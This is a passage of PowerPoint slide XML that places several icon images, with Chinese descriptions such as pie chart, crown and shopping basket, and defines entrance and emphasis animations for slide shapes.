            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="1699260" y="3030855"/>
            <a:ext cx="401955" cy="401955"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="18" name="图片 17" descr="饼图"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId24">
            <a:extLst>
              <a:ext uri="{96DAC541-7B7A-43D3-8B79-37D633B846F1}">
                <asvg:svgBlip xmlns:asvg="http://schemas.microsoft.com/office/drawing/2016/SVG/main" r:embed="rId25"/>
              </a:ext>
            </a:extLst>
          </a:blip>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="3604260" y="3141980"/>
            <a:ext cx="495935" cy="495935"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="19" name="图片 18" descr="循环箭头"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId26">
            <a:extLst>
              <a:ext uri="{96DAC541-7B7A-43D3-8B79-37D633B846F1}">
                <asvg:svgBlip xmlns:asvg="http://schemas.microsoft.com/office/drawing/2016/SVG/main" r:embed="rId27"/>
              </a:ext>
            </a:extLst>
          </a:blip>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="523875" y="2791460"/>
            <a:ext cx="523875" cy="523875"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="22" name="图片 21" descr="信"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId28">
            <a:extLst>
              <a:ext uri="{96DAC541-7B7A-43D3-8B79-37D633B846F1}">
                <asvg:svgBlip xmlns:asvg="http://schemas.microsoft.com/office/drawing/2016/SVG/main" r:embed="rId29"/>
              </a:ext>
            </a:extLst>
          </a:blip>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="914400" y="2324100"/>
            <a:ext cx="467360" cy="467360"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="23" name="图片 22" descr="声音"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId30">
            <a:extLst>
              <a:ext uri="{96DAC541-7B7A-43D3-8B79-37D633B846F1}">
                <asvg:svgBlip xmlns:asvg="http://schemas.microsoft.com/office/drawing/2016/SVG/main" r:embed="rId31"/>
              </a:ext>
            </a:extLst>
          </a:blip>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="1828800" y="2476500"/>
            <a:ext cx="467360" cy="467360"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="24" name="图片 23" descr="上学"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId32">
            <a:extLst>
              <a:ext uri="{96DAC541-7B7A-43D3-8B79-37D633B846F1}">
                <asvg:svgBlip xmlns:asvg="http://schemas.microsoft.com/office/drawing/2016/SVG/main" r:embed="rId33"/>
              </a:ext>
            </a:extLst>
          </a:blip>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="2743200" y="2324100"/>
            <a:ext cx="574040" cy="574040"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="25" name="图片 24" descr="上学"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId34">
            <a:extLst>
              <a:ext uri="{96DAC541-7B7A-43D3-8B79-37D633B846F1}">
                <asvg:svgBlip xmlns:asvg="http://schemas.microsoft.com/office/drawing/2016/SVG/main" r:embed="rId35"/>
              </a:ext>
            </a:extLst>
          </a:blip>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="3604260" y="2545080"/>
            <a:ext cx="527685" cy="527685"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="26" name="图片 25" descr="上课"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId36">
            <a:extLst>
              <a:ext uri="{96DAC541-7B7A-43D3-8B79-37D633B846F1}">
                <asvg:svgBlip xmlns:asvg="http://schemas.microsoft.com/office/drawing/2016/SVG/main" r:embed="rId37"/>
              </a:ext>
            </a:extLst>
          </a:blip>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="4054475" y="1998980"/>
            <a:ext cx="476885" cy="476885"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="27" name="图片 26" descr="皇冠"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId38">
            <a:extLst>
              <a:ext uri="{96DAC541-7B7A-43D3-8B79-37D633B846F1}">
                <asvg:svgBlip xmlns:asvg="http://schemas.microsoft.com/office/drawing/2016/SVG/main" r:embed="rId39"/>
              </a:ext>
            </a:extLst>
          </a:blip>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="1047750" y="3238500"/>
            <a:ext cx="523875" cy="523875"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="28" name="图片 27" descr="纸笔"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId40">
            <a:extLst>
              <a:ext uri="{96DAC541-7B7A-43D3-8B79-37D633B846F1}">
                <asvg:svgBlip xmlns:asvg="http://schemas.microsoft.com/office/drawing/2016/SVG/main" r:embed="rId41"/>
              </a:ext>
            </a:extLst>
          </a:blip>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="914400" y="1040130"/>
            <a:ext cx="568325" cy="568325"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="29" name="图片 28" descr="购物篮"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId42">
            <a:extLst>
              <a:ext uri="{96DAC541-7B7A-43D3-8B79-37D633B846F1}">
                <asvg:svgBlip xmlns:asvg="http://schemas.microsoft.com/office/drawing/2016/SVG/main" r:embed="rId43"/>
              </a:ext>
            </a:extLst>
          </a:blip>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="3317240" y="1901190"/>
            <a:ext cx="574675" cy="574675"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
    </p:spTree>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1" presetClass="entr" presetSubtype="0" fill="hold" grpId="0" nodeType="afterEffect">
                                  <p:stCondLst>
                                    <p:cond delay="0"/>
                                  </p:stCondLst>
                                  <p:iterate type="lt">
                                    <p:tmPct val="10000"/>
                                  </p:iterate>
                                  <p:childTnLst>
                                    <p:set>
                                      <p:cBhvr>
                                        <p:cTn id="12" dur="1" fill="hold">
                                          <p:stCondLst>
                                            <p:cond delay="0"/>
                                          </p:stCondLst>
                                        </p:cTn>
                                        <p:tgtEl>
                                          <p:spTgt spid="3"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>style.visibility</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:to>
                                        <p:strVal val="visible"/>
                                      </p:to>
                                    </p:set>
                                    <p:anim calcmode="lin" valueType="num">
                                      <p:cBhvr>
                                        <p:cTn id="13" dur="500" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="3"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>ppt_x</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:tavLst>
                                        <p:tav tm="0">
                                          <p:val>
                                            <p:strVal val="#ppt_x"/>
                                          </p:val>
                                        </p:tav>
                                        <p:tav tm="50000">
                                          <p:val>
                                            <p:strVal val="#ppt_x+.1"/>
                                          </p:val>
                                        </p:tav>
                                        <p:tav tm="100000">
                                          <p:val>
                                            <p:strVal val="#ppt_x"/>
                                          </p:val>
                                        </p:tav>
                                      </p:tavLst>
                                    </p:anim>
                                    <p:anim calcmode="lin" valueType="num">
                                      <p:cBhvr>
                                        <p:cTn id="14" dur="500" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="3"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>ppt_y</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:tavLst>
                                        <p:tav tm="0">
                                          <p:val>
                                            <p:strVal val="#ppt_y"/>
                                          </p:val>
                                        </p:tav>
                                        <p:tav tm="100000">
                                          <p:val>
                                            <p:strVal val="#ppt_y"/>
                                          </p:val>
                                        </p:tav>
                                      </p:tavLst>
                                    </p:anim>
                                    <p:anim calcmode="lin" valueType="num">
                                      <p:cBhvr>
                                        <p:cTn id="15" dur="500" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="3"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>ppt_h</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:tavLst>
                                        <p:tav tm="0">
                                          <p:val>
                                            <p:strVal val="#ppt_h/10"/>
                                          </p:val>
                                        </p:tav>
                                        <p:tav tm="50000">
                                          <p:val>
                                            <p:strVal val="#ppt_h+.01"/>
                                          </p:val>
                                        </p:tav>
                                        <p:tav tm="100000">
                                          <p:val>
                                            <p:strVal val="#ppt_h"/>
                                          </p:val>
                                        </p:tav>
                                      </p:tavLst>
                                    </p:anim>
                                    <p:anim calcmode="lin" valueType="num">
                                      <p:cBhvr>
                                        <p:cTn id="16" dur="500" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="3"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>ppt_w</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:tavLst>
                                        <p:tav tm="0">
                                          <p:val>
                                            <p:strVal val="#ppt_w/10"/>
                                          </p:val>
                                        </p:tav>
                                        <p:tav tm="50000">
                                          <p:val>
                                            <p:strVal val="#ppt_w+.01"/>
                                          </p:val>
                                        </p:tav>
                                        <p:tav tm="100000">
                                          <p:val>
                                            <p:strVal val="#ppt_w"/>
                                          </p:val>
                                        </p:tav>
                                      </p:tavLst>
                                    </p:anim>
                                    <p:animEffect transition="in" filter="fade">
                                      <p:cBhvr>
                                        <p:cTn id="17" dur="500" tmFilter="0,0; .5, 1; 1, 1"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="3"/>
                                        </p:tgtEl>
                                      </p:cBhvr>
                                    </p:animEffect>
                                  </p:childTnLst>
                                </p:cTn>
                              </p:par>
                            </p:childTnLst>
                          </p:cTn>
                        </p:par>
                        <p:par>
                          <p:cTn id="18" fill="hold">
                            <p:stCondLst>
                              <p:cond delay="2049"/>
                            </p:stCondLst>
                            <p:childTnLst>
                              <p:par>
                                <p:cTn id="19" presetID="26" presetClass="emph" presetSubtype="0" fill="hold" grpId="1" nodeType="afterEffect">
                                  <p:stCondLst>
                                    <p:cond delay="0"/>
                                  </p:stCondLst>
                                  <p:iterate type="lt">
                                    <p:tmPct val="0"/>
                                  </p:iterate>
                                  <p:childTnLst>
                                    <p:animEffect transition="out" filter="fade">
                                      <p:cBhvr>
                                        <p:cTn id="20" dur="500" tmFilter="0, 0; .2, .5; .8, .5; 1, 0"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="3"/>
                                        </p:tgtEl>
                                      </p:cBhvr>
                                    </p:animEffect>
                                    <p:animScale>
                                      <p:cBhvr>
                                        <p:cTn id="21" dur="250" autoRev="1" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="3"/>
                                        </p:tgtEl>
                                      </p:cBhvr>
                                      <p:by x="105000" y="105000"/>
                                    </p:animScale>
                                  </p:childTnLst>
                                </p:cTn>
                              </p:par>
                            </p:childTnLst>
                          </p:cTn>
                        </p:par>
                        <p:par>
                          <p:cTn id="22" fill="hold">
                            <p:stCondLst>
                              <p:cond delay="2549"/>
                            </p:stCondLst>
                            <p:childTnLst>
                              <p:par>
                                <p:cTn id="23" presetID="41" presetClass="entr" presetSubtype="0" fill="hold" grpId="0" nodeType="afterEffect">
                                  <p:stCondLst>
                                    <p:cond delay="0"/>
                                  </p:stCondLst>
                                  <p:iterate type="lt">
                                    <p:tmPct val="10000"/>
                                  </p:iterate>
                                  <p:childTnLst>
                                    <p:set>
                                      <p:cBhvr>
                                        <p:cTn id="24" dur="1" fill="hold">
                                          <p:stCondLst>
                                            <p:cond delay="0"/>
                                          </p:stCondLst>
                                        </p:cTn>
                                        <p:tgtEl>
                                          <p:spTgt spid="21"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>style.visibility</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:to>
                                        <p:strVal val="visible"/>
                                      </p:to>
                                    </p:set>
                                    <p:anim calcmode="lin" valueType="num">
                                      <p:cBhvr>
                                        <p:cTn id="25" dur="500" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="21"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>ppt_x</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:tavLst>
                                        <p:tav tm="0">
                                          <p:val>
                                            <p:strVal val="#ppt_x"/>
                                          </p:val>
                                        </p:tav>
                                        <p:tav tm="50000">
                                          <p:val>
                                            <p:strVal val="#ppt_x+.1"/>
                                          </p:val>
                                        </p:tav>
                                        <p:tav tm="100000">
                                          <p:val>
                                            <p:strVal val="#ppt_x"/>
                                          </p:val>
                                        </p:tav>
                                      </p:tavLst>
                                    </p:anim>
                                    <p:anim calcmode="lin" valueType="num">
                                      <p:cBhvr>
                                        <p:cTn id="26" dur="500" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="21"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>ppt_y</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:tavLst>
                                        <p:tav tm="0">
                                          <p:val>
                                            <p:strVal val="#ppt_y"/>
                                          </p:val>
                                        </p:tav>
                                        <p:tav tm="100000">
                                          <p:val>
                                            <p:strVal val="#ppt_y"/>
                                          </p:val>
                                        </p:tav>
                                      </p:tavLst>
                                    </p:anim>
                                    <p:anim calcmode="lin" valueType="num">
                                      <p:cBhvr>
                                        <p:cTn id="27" dur="500" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="21"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>ppt_h</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:tavLst>
                                        <p:tav tm="0">
                                          <p:val>
                                            <p:strVal val="#ppt_h/10"/>
                                          </p:val>
                                        </p:tav>
                                        <p:tav tm="50000">
                                          <p:val>
                                            <p:strVal val="#ppt_h+.01"/>
                                          </p:val>
                                        </p:tav>
                                        <p:tav tm="100000">
                                          <p:val>
                                            <p:strVal val="#ppt_h"/>
                                          </p:val>
                                        </p:tav>
                                      </p:tavLst>
                                    </p:anim>
                                    <p:anim calcmode="lin" valueType="num">
                                      <p:cBhvr>
                                        <p:cTn id="28" dur="500" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="21"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>ppt_w</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:tavLst>
                                        <p:tav tm="0">
                                          <p:val>
                                            <p:strVal val="#ppt_w/10"/>
                                          </p:val>
                                        </p:tav>
                                        <p:tav tm="50000">
                                          <p:val>
                                            <p:strVal val="#ppt_w+.01"/>
                                          </p:val>
                                        </p:tav>
                                        <p:tav tm="100000">
                                          <p:val>
                                            <p:strVal val="#ppt_w"/>
                                          </p:val>
                                        </p:tav>
                                      </p:tavLst>
                                    </p:anim>
                                    <p:animEffect transition="in" filter="fade">
                                      <p:cBhvr>
                                        <p:cTn id="29" dur="500" tmFilter="0,0; .5, 1; 1, 1"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="21"/>
                                        </p:tgtEl>
                                      </p:cBhvr>
                                    </p:animEffect>
                                  </p:childTnLst>
                                </p:cTn>
                              </p:par>
                            </p:childTnLst>
                          </p:cTn>
                        </p:par>
                        <p:par>
                          <p:cTn id="30" fill="hold">
                            <p:stCondLst>
                              <p:cond delay="3299"/>
                            </p:stCondLst>
                            <p:childTnLst>
                              <p:par>
                                <p:cTn id="31" presetID="26" presetClass="emph" presetSubtype="0" fill="hold" grpId="1" nodeType="afterEffect">
                                  <p:stCondLst>
                                    <p:cond delay="0"/>
                                  </p:stCondLst>
                                  <p:iterate type="lt">
                                    <p:tmPct val="0"/>
                                  </p:iterate>
                                  <p:childTnLst>
                                    <p:animEffect transition="out" filter="fade">
                                      <p:cBhvr>
                                        <p:cTn id="32" dur="500" tmFilter="0, 0; .2, .5; .8, .5; 1, 0"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="21"/>
                                        </p:tgtEl>
                                      </p:cBhvr>
                                    </p:animEffect>
                                    <p:animScale>
                                      <p:cBhvr>
                                        <p:cTn id="33" dur="250" autoRev="1" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="21"/>
                                        </p:tgtEl>
                                      </p:cBhvr>
                                      <p:by x="105000" y="105000"/>
                                    </p:animScale>
                                  </p:childTnLst>
                                </p:cTn>
                              </p:par>
                            </p:childTnLst>
                          </p:cTn>
                        </p:par>
                        <p:par>
                          <p:cTn id="34" fill="hold">
                            <p:stCondLst>
                              <p:cond delay="3799"/>
                            </p:stCondLst>
                            <p:childTnLst>
                              <p:par>
                                <p:cTn id="35" presetID="16" presetClass="entr" presetSubtype="21" fill="hold" nodeType="afterEffect">
                                  <p:stCondLst>
                                    <p:cond delay="0"/>
                                  </p:stCondLst>
                                  <p:childTnLst>
                                    <p:set>
                                      <p:cBhvr>
                                        <p:cTn id="36" dur="1" fill="hold">
                                          <p:stCondLst>
                                            <p:cond delay="0"/>
                                          </p:stCondLst>
                                        </p:cTn>
                                        <p:tgtEl>
                                          <p:spTgt spid="20"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>style.visibility</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:to>
                                        <p:strVal val="visible"/>
                                      </p:to>
                                    </p:set>
                                    <p:animEffect transition="in" filter="barn(inVertical)">
                                      <p:cBhvr>
                                        <p:cTn id="37" dur="500"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="20"/>
                                        </p:tgtEl>
                                      </p:cBhvr>
                                    </p:animEffect>
                                  </p:childTnLst>
                                </p:cTn>
                              </p:par>
                            </p:childTnLst>
                          </p:cTn>
                        </p:par>
                        <p:par>
                          <p:cTn id="38" fill="hold">
                            <p:stCondLst>
                              <p:cond delay="4299"/>
                            </p:stCondLst>
                            <p:childTnLst>
                              <p:par>
                                <p:cTn id="39" presetID="41" presetClass="entr" presetSubtype="0" fill="hold" grpId="0" nodeType="afterEffect">
                                  <p:stCondLst>
                                    <p:cond delay="0"/>
                                  </p:stCondLst>
                                  <p:iterate type="lt">
                                    <p:tmPct val="10000"/>
                                  </p:iterate>
                                  <p:childTnLst>
                                    <p:set>
                                      <p:cBhvr>
                                        <p:cTn id="40" dur="1" fill="hold">
                                          <p:stCondLst>
                                            <p:cond delay="0"/>
                                          </p:stCondLst>
                                        </p:cTn>
                                        <p:tgtEl>
                                          <p:spTgt spid="10"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>style.visibility</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:to>
                                        <p:strVal val="visible"/>
                                      </p:to>
                                    </p:set>
                                    <p:anim calcmode="lin" valueType="num">
                                      <p:cBhvr>
                                        <p:cTn id="41" dur="500" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="10"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>ppt_x</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:tavLst>
                                        <p:tav tm="0">
                                          <p:val>
                                            <p:strVal val="#ppt_x"/>
                                          </p:val>
                                        </p:tav>
                                        <p:tav tm="50000">
                                          <p:val>
                                            <p:strVal val="#ppt_x+.1"/>
                                          </p:val>
                                        </p:tav>
                                        <p:tav tm="100000">
                                          <p:val>
                                            <p:strVal val="#ppt_x"/>
                                          </p:val>
                                        </p:tav>
                                      </p:tavLst>
                                    </p:anim>
                                    <p:anim calcmode="lin" valueType="num">
                                      <p:cBhvr>
                                        <p:cTn id="42" dur="500" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="10"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>ppt_y</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:tavLst>
                                        <p:tav tm="0">
                                          <p:val>
                                            <p:strVal val="#ppt_y"/>
                                          </p:val>
                                        </p:tav>
                                        <p:tav tm="100000">
                                          <p:val>
                                            <p:strVal val="#ppt_y"/>
                                          </p:val>
                                        </p:tav>
                                      </p:tavLst>
                                    </p:anim>
                                    <p:anim calcmode="lin" valueType="num">
                                      <p:cBhvr>
                                        <p:cTn id="43" dur="500" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="10"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>ppt_h</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:tavLst>
                                        <p:tav tm="0">
                                          <p:val>
                                            <p:strVal val="#ppt_h/10"/>
                                          </p:val>
                                        </p:tav>
                                        <p:tav tm="50000">
                                          <p:val>
                                            <p:strVal val="#ppt_h+.01"/>
                                          </p:val>
                                        </p:tav>
                                        <p:tav tm="100000">
                                          <p:val>
                                            <p:strVal val="#ppt_h"/>
                                          </p:val>
                                        </p:tav>
                                      </p:tavLst>
                                    </p:anim>
                                    <p:anim calcmode="lin" valueType="num">
                                      <p:cBhvr>
                                        <p:cTn id="44" dur="500" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="10"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>ppt_w</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:tavLst>
                                        <p:tav tm="0">
                                          <p:val>
                                            <p:strVal val="#ppt_w/10"/>
                                          </p:val>
                                        </p:tav>
                                        <p:tav tm="50000">
                                          <p:val>
                                            <p:strVal val="#ppt_w+.01"/>
                                          </p:val>
                                        </p:tav>
                                        <p:tav tm="100000">
                                          <p:val>
                                            <p:strVal val="#ppt_w"/>
                                          </p:val>
                                        </p:tav>
                                      </p:tavLst>
                                    </p:anim>
                                    <p:animEffect transition="in" filter="fade">
                                      <p:cBhvr>
                                        <p:cTn id="45" dur="500" tmFilter="0,0; .5, 1; 1, 1"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="10"/>
                                        </p:tgtEl>
                                      </p:cBhvr>
                                    </p:animEffect>
                                  </p:childTnLst>
                                </p:cTn>
                              </p:par>
                            </p:childTnLst>
                          </p:cTn>
                        </p:par>
                        <p:par>
                          <p:cTn id="46" fill="hold">
                            <p:stCondLst>
                              <p:cond delay="5050"/>
                            </p:stCondLst>
                            <p:childTnLst>
                              <p:par>
                                <p:cTn id="47" presetID="26" presetClass="emph" presetSubtype="0" fill="hold" grpId="1" nodeType="afterEffect">
                                  <p:stCondLst>
                                    <p:cond delay="0"/>
                                  </p:stCondLst>
                                  <p:iterate type="lt">
                                    <p:tmPct val="0"/>
                                  </p:iterate>
                                  <p:childTnLst>
                                    <p:animEffect transition="out" filter="fade">
                                      <p:cBhvr>
                                        <p:cTn id="48" dur="500" tmFilter="0, 0; .2, .5; .8, .5; 1, 0"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="10"/>
                                        </p:tgtEl>
                                      </p:cBhvr>
                                    </p:animEffect>
                                    <p:animScale>
                                      <p:cBhvr>
                                        <p:cTn id="49" dur="250" autoRev="1" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="10"/>
                                        </p:tgtEl>
                                      </p:cBhvr>
                                      <p:by x="105000" y="105000"/>
                                    </p:animScale>
                                  </p:childTnLst>
                                </p:cTn>
                              </p:par>
                            </p:childTnLst>
                          </p:cTn>
                        </p:par>
                        <p:par>
                          <p:cTn id="50" fill="hold">
                            <p:stCondLst>
                              <p:cond delay="5550"/>
                            </p:stCondLst>
                            <p:childTnLst>
                              <p:par>
                                <p:cTn id="51" presetID="41" presetClass="entr" presetSubtype="0" fill="hold" grpId="0" nodeType="afterEffect">
                                  <p:stCondLst>
                                    <p:cond delay="0"/>
                                  </p:stCondLst>
                                  <p:iterate type="lt">
                                    <p:tmPct val="10000"/>
                                  </p:iterate>
                                  <p:childTnLst>
                                    <p:set>
                                      <p:cBhvr>
                                        <p:cTn id="52" dur="1" fill="hold">
                                          <p:stCondLst>
                                            <p:cond delay="0"/>
                                          </p:stCondLst>
                                        </p:cTn>
                                        <p:tgtEl>
                                          <p:spTgt spid="11"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>style.visibility</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:to>
                                        <p:strVal val="visible"/>
                                      </p:to>
                                    </p:set>
                                    <p:anim calcmode="lin" valueType="num">
                                      <p:cBhvr>
                                        <p:cTn id="53" dur="500" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="11"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>ppt_x</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:tavLst>
                                        <p:tav tm="0">
                                          <p:val>
                                            <p:strVal val="#ppt_x"/>
                                          </p:val>
                                        </p:tav>
                                        <p:tav tm="50000">
                                          <p:val>
                                            <p:strVal val="#ppt_x+.1"/>
                                          </p:val>
                                        </p:tav>
                                        <p:tav tm="100000">
                                          <p:val>
                                            <p:strVal val="#ppt_x"/>
                                          </p:val>
                                        </p:tav>
                                      </p:tavLst>
                                    </p:anim>
                                    <p:anim calcmode="lin" valueType="num">
                                      <p:cBhvr>
                                        <p:cTn id="54" dur="500" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="11"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>ppt_y</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:tavLst>
                                        <p:tav tm="0">
                                          <p:val>
                                            <p:strVal val="#ppt_y"/>
                                          </p:val>
                                        </p:tav>
                                        <p:tav tm="100000">
                                          <p:val>
                                            <p:strVal val="#ppt_y"/>
                                          </p:val>
                                        </p:tav>
                                      </p:tavLst>
                                    </p:anim>
                                    <p:anim calcmode="lin" valueType="num">
                                      <p:cBhvr>
                                        <p:cTn id="55" dur="500" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="11"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
